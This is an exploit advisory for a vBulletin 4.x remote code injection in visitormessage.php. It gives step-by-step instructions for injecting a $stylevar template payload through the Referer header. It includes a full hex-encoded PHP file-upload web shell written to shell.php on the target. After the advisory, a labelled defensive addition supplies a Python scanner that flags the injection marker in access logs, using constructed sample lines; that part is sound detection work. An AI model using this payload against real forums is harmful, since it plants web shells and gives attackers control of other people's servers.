Exploit Title: vBulletin 4.x.x 'visitormessage.php' Remote Code Injection Vulnerability
Discovered By: Dariush Nasirpour (Net.Edit0r)
Vendor Homepage: vBulletin.com
Tested on: [vBulletin 4.2.2]
Remote Code Injection:
1) Register an account on the target vBulletin forum, e.g. http://www.victim.com/register.php (example username: blackhat)
2) Go to your user profile, e.g. http://black-hg.org/cc/members/blackhat.html
3) Post something as a visitor message and record the POST data with Live HTTP Headers
[example] : message_backup=&message=For-Test-Sample&wysiwyg=1&sbutton=%D8%A7%D8%B1%D8%B3%D8%A7%D9%84+%D9%BE%DB%8C%D8%BA%D8%A7%D9%85&fromquickcomment=1&s=&securitytoken=1425024074-5bcfb5b83d466416ed95e80021abee86063cdf6e&do=message&u=110&u2=&loggedinuser=110&parseurl=1&lastcomment=1425022046&allow_ajax_qc=1&fromconverse=
4) Change the message to anything else, e.g. "For-Test-Sample" => "ALEEEEEEEEX" (vBulletin does not let you send the same comment twice within a short time)
[Now post this with HackBar:]
URL: http://black-hg.org/cc/visitormessage.php?do=message
[Post data]
message_backup=&message=ALEEEEEEEEX&wysiwyg=1&sbutton=%D8%A7%D8%B1%D8%B3%D8%A7%D9%84+%D9%BE%DB%8C%D8%BA%D8%A7%D9%85&fromquickcomment=1&s=&securitytoken=1425024074-5bcfb5b83d466416ed95e80021abee86063cdf6e&do=message&u=110&u2=&loggedinuser=110&parseurl=1&lastcomment=1425022046&allow_ajax_qc=1&fromconverse=
[And the Referer header:]
PoC: http://black-hg.org/cc/members/blackhat.html?a=$stylevar[${${file_put_contents("shell.php","hacked[u can upload shell]")}}]"
5) Open HackBar and tamper the request with Tamper Data:
The Referer has been URL-encoded by the browser, so you have to replace it again with Tamper Data: http://black-hg.org/cc/members/blackhat.html?a=$stylevar[${${file_put_contents("shell.php","hacked[you can upload shell]")}}]" and submit the request.
?a=$stylevar[${${file_put_contents("shell.php","\x3C\x68\x74\x6D\x6C\x3E\xD\xA\x20\x20\x20\x20\x3C\x62\x6F\x64\x79\x3E\xD\xA\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x66\x6F\x72\x6D\x20\x6D\x65\x74\x68\x6F\x64\x3D\x22\x70\x6F\x73\x74\x22\x20\x61\x63\x74\x69\x6F\x6E\x3D\x22\x22\x20\x65\x6E\x63\x74\x79\x70\x65\x3D\x22\x6D\x75\x6C\x74\x69\x70\x61\x72\x74\x2F\x66\x6F\x72\x6D\x2D\x64\x61\x74\x61\x22\x3E\xD\xA\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x6C\x61\x62\x65\x6C\x20\x66\x6F\x72\x3D\x22\x66\x69\x6C\x65\x22\x3E\x46\x69\x6C\x65\x6E\x61\x6D\x65\x3A\x3C\x2F\x6C\x61\x62\x65\x6C\x3E\x3C\x69\x6E\x70\x75\x74\x20\x74\x79\x70\x65\x3D\x22\x66\x69\x6C\x65\x22\x20\x6E\x61\x6D\x65\x3D\x22\x66\x69\x6C\x65\x31\x22\x20\x69\x64\x3D\x22\x66\x69\x6C\x65\x31\x22\x20\x2F\x3E\xD\xA\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x62\x72\x3E\xD\xA\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x69\x6E\x70\x75\x74\x20\x74\x79\x70\x65\x3D\x22\x73\x75\x62\x6D\x69\x74\x22\x20\x6E\x61\x6D\x65\x3D\x22\x73\x75\x62\x6D\x69\x74\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x53\x75\x62\x6D\x69\x74\x22\x20\x2F\x3E\xD\xA\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x2F\x66\x6F\x72\x6D\x3E\xD\xA\x20\x20\x20\x20\x3C\x2F\x62\x6F\x64\x79\x3E\xD\xA\x3C\x2F\x68\x74\x6D\x6C\x3E\xD\xA\x3C\x3F\x70\x68\x70\xD\xA\x69\x66\x28\x69\x73\x73\x65\x74\x28\x24\x5F\x50\x4F\x53\x54\x5B\x27\x73\x75\x62\x6D\x69\x74\x27\x5D\x29\x29\x20\x7B\xD\xA\x20\x20\x20\x20\x69\x66\x20\x28\x24\x5F\x46\x49\x4C\x45\x53\x5B\x22\x66\x69\x6C\x65\x31\x22\x5D\x5B\x22\x65\x72\x72\x6F\x72\x22\x5D\x20\x3E\x20\x30\x29\x20\x7B\xD\xA\x20\x20\x20\x20\x20\x20\x20\x20\x65\x63\x68\x6F\x20\x22\x45\x72\x72\x6F\x72\x3A\x20\x22\x20\x2E\x20\x24\x5F\x46\x49\x4C\x45\x53\x5B\x22\x66\x69\x6C\x65\x31\x22\x5D\x5B\x22\x65\x72\x72\x6F\x72\x22\x5D\x20\x2E\x20\x22\x3C\x62\x72\x20\x2F\x3E\x22\x3B\xD\xA\x20\x20\x20\x20\x7D\x20\xD\xA\x20\x20\x20\x20\x65\x6C\x73\x65\x20\xD\xA\x20\x20\x20\x20\x7B\xD\xA\x20\x20\x20\x20\x20\x20\x20\x20\x6D\x6F\x76\x65\x5F\x75\x70\x6C\x6F\x61\x64
\x65\x64\x5F\x66\x69\x6C\x65\x28\x24\x5F\x46\x49\x4C\x45\x53\x5B\x22\x66\x69\x6C\x65\x31\x22\x5D\x5B\x22\x74\x6D\x70\x5F\x6E\x61\x6D\x65\x22\x5D\x2C\x67\x65\x74\x63\x77\x64\x28\x29\x2E\x22\x5C\x5C\x22\x2E\x24\x5F\x46\x49\x4C\x45\x53\x5B\x22\x66\x69\x6C\x65\x31\x22\x5D\x5B\x22\x6E\x61\x6D\x65\x22\x5D\x29\x3B\xD\xA\x20\x20\x20\x20\x20\x20\x20\x20\x65\x63\x68\x6F\x20\x22\x75\x70\x6C\x6F\x61\x64\x20\x69\x73\x20\x6F\x6B\x22\x3B\xD\xA\x20\x20\x20\x20\x7D\xD\xA\x7D\xD\xA\x3F\x3E")}}]
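As an added defensive example (not part of the advisory, and not vBulletin code), the following Python scans web server access logs in combined format for the marker this injection leaves behind: a `$stylevar[` reference wrapping a `${...}` expression, in either the Referer field or the request line. Because the advisory notes that the browser URL-encodes the Referer, each field is URL-decoded (a bounded number of times, so double-encoding does not hide the marker) before matching. The hostnames, IP addresses and log lines are constructed for the example.

```python
import re
from urllib.parse import unquote

# Apache/nginx combined log format:
# IP ident user [timestamp] "REQUEST" STATUS BYTES "REFERER" "USER-AGENT"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Marker taken from the advisory's PoC: a $stylevar[...] reference that
# contains a ${ ... } expression, i.e. template code handed to the evaluator.
MARKER_RE = re.compile(r"\$stylevar\s*\[.*\$\{", re.IGNORECASE | re.DOTALL)


def decode_fully(value, rounds=3):
    """URL-decode repeatedly (bounded) so double-encoded payloads still match."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_line(line):
    """Return a finding dict for a suspicious line, or None for a clean/unparsable one."""
    m = LOG_RE.match(line)
    if not m:
        return None
    fields = [
        name
        for name in ("referer", "request")
        if MARKER_RE.search(decode_fully(m.group(name)))
    ]
    if not fields:
        return None
    return {
        "ip": m.group("ip"),
        "timestamp": m.group("ts"),
        "request": m.group("request"),
        "fields": fields,
    }


def scan(lines):
    """Scan an iterable of log lines and collect all findings."""
    return [hit for hit in (inspect_line(line) for line in lines) if hit]


# Constructed sample log lines (hosts and addresses are placeholders).
ENCODED_PAYLOAD = (
    "%24stylevar%5B%24%7B%24%7Bfile_put_contents%28%22shell.php%22%2C%22x%22%29%7D%7D%5D"
)
SAMPLE_LOG = [
    # Ordinary visitor message post: referer is the plain profile page.
    '203.0.113.7 - - [27/Feb/2015:10:15:02 +0000] "POST /visitormessage.php?do=message HTTP/1.1" '
    '200 512 "http://forum.example/members/blackhat.html" "Mozilla/5.0"',
    # Same endpoint, but the browser-encoded Referer carries the template payload.
    '203.0.113.7 - - [27/Feb/2015:10:16:40 +0000] "POST /visitormessage.php?do=message HTTP/1.1" '
    '200 512 "http://forum.example/members/blackhat.html?a=' + ENCODED_PAYLOAD + '" "Mozilla/5.0"',
    # Double-encoded variant of the same Referer.
    '203.0.113.7 - - [27/Feb/2015:10:17:05 +0000] "POST /visitormessage.php?do=message HTTP/1.1" '
    '200 512 "http://forum.example/members/blackhat.html?a=%2524stylevar%255B%2524%257B%2524%257Bx%257D%257D%255D" "Mozilla/5.0"',
    # Payload in the request line itself (profile page fetched with the crafted query).
    '198.51.100.9 - - [27/Feb/2015:10:18:11 +0000] "GET /members/blackhat.html?a=' + ENCODED_PAYLOAD + ' HTTP/1.1" '
    '200 8192 "-" "Mozilla/5.0"',
    # Someone searching for the word "$stylevar" without a ${ expression: not flagged.
    '198.51.100.9 - - [27/Feb/2015:10:19:30 +0000] "GET /search.php?q=%24stylevar HTTP/1.1" '
    '200 1024 "http://forum.example/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['timestamp']} {hit['ip']} {hit['request']} marker in {hit['fields']}")
```

Run against a real access log by replacing `SAMPLE_LOG` with the file's lines; the regex assumes the combined log format, so adjust `LOG_RE` if the server logs a different layout. A match on the Referer of a `POST /visitormessage.php` request is the specific indicator for this advisory; a match anywhere is worth an alert, since legitimate clients never send template syntax in a URL.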